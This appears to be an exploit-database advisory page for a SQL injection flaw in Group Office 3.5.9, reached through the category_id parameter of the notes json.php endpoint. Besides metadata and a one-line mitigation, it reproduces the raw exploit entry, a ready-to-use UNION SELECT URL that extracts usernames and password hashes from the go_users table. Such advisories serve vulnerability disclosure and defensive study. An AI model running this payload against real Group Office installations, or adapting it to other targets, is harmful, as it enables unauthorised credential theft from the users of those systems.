Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability

vendor:

Group Office

by:

ViciOuS

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Group Office

Affected Version From: 3.5.9

Affected Version To: 3.5.9

Patch Exists: N/A

Related CWE: N/A

CPE: a:groupoffice:groupoffice

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability

A SQL injection vulnerability exists in Group Office, which allows an attacker to execute arbitrary SQL commands via the 'category_id' parameter in the '/notes/json.php?task=category' URL.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=====================================================================================
Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability
=====================================================================================

########################################################################################

Author : ViciOuS
Author Web Page :http://www.sabotaj.in
Email : vicious[at]sabotaj.in
Script Page : http://www.group-office.com

########################################################################################
 
Sql Injection :

http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--

########################################################################################
Thanks WwW.sabotaj.iN
########################################################################################